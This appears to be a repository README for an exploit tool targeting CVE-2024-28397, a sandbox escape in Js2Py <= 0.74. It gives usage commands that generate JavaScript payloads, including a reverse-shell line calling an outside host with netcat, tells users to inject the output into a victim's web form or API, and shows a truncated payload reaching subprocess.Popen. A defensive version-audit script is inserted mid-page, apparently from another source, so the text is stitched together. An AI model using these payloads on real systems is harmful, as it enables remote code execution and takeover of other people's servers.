Professional exploit for CVE-2024-28397: Js2Py Sandbox Escape leading to Remote Code Execution (RCE). Includes modular payload generation.

xeloxa/CVE-2024-28397-Js2Py-RCE-Exploit

💡 Deep Dive: Click here to read the full technical briefing (PDF).

CVE-2024-28397: Js2Py Sandbox Escape Payload Generator

A professional payload generator for CVE-2024-28397. This tool generates malicious JavaScript code designed to escape the js2py sandbox (versions <= 0.74) and execute arbitrary commands on the target system.

🚨 Vulnerability Details

  • CVE ID: CVE-2024-28397
  • Affected Component: Js2Py <= 0.74
  • Impact: Remote Code Execution (RCE) / Sandbox Escape
  • Mechanism: Exploits Object.getOwnPropertyNames to access Python's subprocess.Popen class from within the JavaScript environment.
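
To check whether a project falls inside the affected range listed above, the following added example (not part of this repository's code) audits requirements-style text and the installed distribution for Js2Py <= 0.74. The function names, the verdict strings and the sample requirements text are constructed for illustration.

```python
import re
from importlib import metadata

AFFECTED_MAX = (0, 74)  # upper bound of the affected range stated on this page
REQ = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?([^;#]*)")
SPEC = re.compile(r"(===|==|~=|>=|<=|!=|>|<)\s*([^\s,]+)")

def parse_version(text):
    """Leading numeric release as a tuple, trailing zeros dropped (0.74.0 -> (0, 74))."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)

def is_affected(version):
    return parse_version(version) <= AFFECTED_MAX

def audit_requirements(text):
    """Return (line_no, requirement, verdict) for each Js2Py line in requirements text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        m = REQ.match(raw)
        # Compare normalised project names so Js2Py, js2py and JS2PY all match.
        if not m or re.sub(r"[-_.]+", "-", m.group(1)).lower() != "js2py":
            continue
        specs = SPEC.findall(m.group(2))
        pins = [v for op, v in specs if op in ("==", "===")]
        floors = [(op, parse_version(v)) for op, v in specs if op in (">", ">=", "~=")]
        if pins:
            verdict = "affected" if is_affected(pins[0]) else "outside range"
        elif any(v > AFFECTED_MAX or (op == ">" and v == AFFECTED_MAX) for op, v in floors):
            verdict = "outside range"
        else:  # no pin and no floor above the bound: the resolver may pick <= 0.74
            verdict = "may resolve to affected"
        findings.append((no, raw.strip(), verdict))
    return findings

def installed_js2py_affected():
    """True/False for the installed distribution, None when Js2Py is not installed."""
    try:
        return is_affected(metadata.version("Js2Py"))
    except metadata.PackageNotFoundError:
        return None

# Constructed sample input, not taken from any real project.
SAMPLE = "# constructed sample\nrequests==2.31.0\nJs2Py==0.74\njs2py>=0.70  # floor\njs2py>0.74\n"
```

A verdict of "outside range" only reflects the bound stated on this page; whether a particular release actually carries a fix has to be confirmed against the upstream project.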

🚀 Usage

This script generates the exact JavaScript payload needed to exploit the vulnerability. You do not need to install js2py to use this tool.

1. Generate a Payload

Run the script with the command you want to execute on the victim's machine.

# Generate payload to run 'id'
python3 exploit.py -c "id"
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. Attack the Target

Copy the output generated by the tool and inject it into the vulnerable application (e.g., a web form, API endpoint, or configuration file that is parsed by js2py).

Example Injection: If a website takes user input and runs it with js2py.eval_js(user_input), pasting the generated code will execute your command on their server.

📝 Example

$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (full malicious code) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 Author

Ali Sünbül (xeloxa)

⚠️ Disclaimer

This software is provided for educational and security research purposes only. The author accepts no responsibility for any misuse of this code. Ensure you have explicit permission before testing this on any system you do not own.
